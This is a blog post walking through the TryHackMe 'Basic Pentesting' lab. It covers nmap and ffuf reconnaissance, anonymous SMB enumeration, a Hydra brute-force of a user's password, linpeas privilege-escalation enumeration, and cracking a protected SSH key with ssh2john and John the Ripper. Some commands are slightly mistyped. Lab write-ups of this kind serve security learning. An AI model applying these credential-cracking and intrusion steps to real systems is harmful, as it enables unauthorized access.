Monday, January 30, 2023

Tryhackme - Basic Pentesting - How I solved it

 BASIC PENTESTING - Tryhackme


#FInding open ports with nmap scan 

Just connect to the box and use nmap to find the open ports.

 nmap -sv ip-address or url 

reveals all the open ports in the address.


#FInding  Hidden directory with ffuf  tool
For hidden directory we can use ffuf tools.

ffuf -u url -w /usr/share/wordlists/dirb/common.txt 

can be used to find hidden directory in the url.

We can also use gobuster and other tool also.


#FInding user with some enumeration

We can search through the website using inspector tools. By using ffuf we  got /development  as hidden directory so when we visit ip_address/development we got two files stating that some user have very easy to crack password. It also says that smb server is running on the web server.
We can use smbclient to print out the shared volumes on the smb server with :
smbclient -L ip_address

By analyzing the output from above command we find that there is anonymous access.So, We can then login to the smb server using anonymous login as :
smbclient \\\\ip_address\\anonymous


After the login , with ls -la command we find that there is a .txt file which we can access to and there is a message mentioning the two user  Jan  and Kay .


#Accessing user password with hydra

After knowing the username we can crack Jan’s password as it was mentioned that Jan has weaker password . We can use graphical hydra to crack the password . 


After the cracking of the password we find that the password for Jan is  armando


#Login with password and privilege escalation 

After getting password we can login to ssh server with the credentials with :
ssh username@ip_address 


After getting to ssh we can manually search for some ways for privilege escalation or we can automatically find the list with linpeas enumeration . Linpeas are faster and helps in finding escalation more better. We can get linpeas on ssh server using scp command as :
scp file_directory&file_name ip_address:/address_to_be_placed
After a thorough search we find that there is  private ssh key for user kay and and we can try to access the user with private ssh key but it is protected with the passphrase. We have to save the private ssh key in a file and made permission to read only using :
chmod 600 file_name

So we have to crack the passphrase . We can crack the passphrase with JohnTheRipper , since the private ssh key is not into hash format we have to change it to hash format with JohnTheRipper ssh2john.py module .This module can be located using the command : locate ssh2john.py . It is generally ins /usr/share/john directory.
Using command : 

python ssh2john.py private_ssh_key_file_name>hashed_file_name


After the file is changed to hash we can crack the passphrase with JohnTheRipper as :
john hashed_file_name  - -wordlist /usr/share/wordlists/rockyou.txt 

Once the passphrase is cracked we can login to ssh with Kay using :

ssh -i private_ssh_key_file_name kay@ip_address


After login to ssh we can cat the pass.bak file to extract the password.



Summary :

Finding open ports
Enumerating for usernames.
Bruteforcing username for password.
Privilege escalation with cracked password

Crack the key_phrase for login.
Finish the problem.





Tools used :
Nmap

 ffuf  or gobuster

 Smbclient

 Hydra

 Linpeas

 scp 

JohnTheRipper  








 


Thursday, September 2, 2021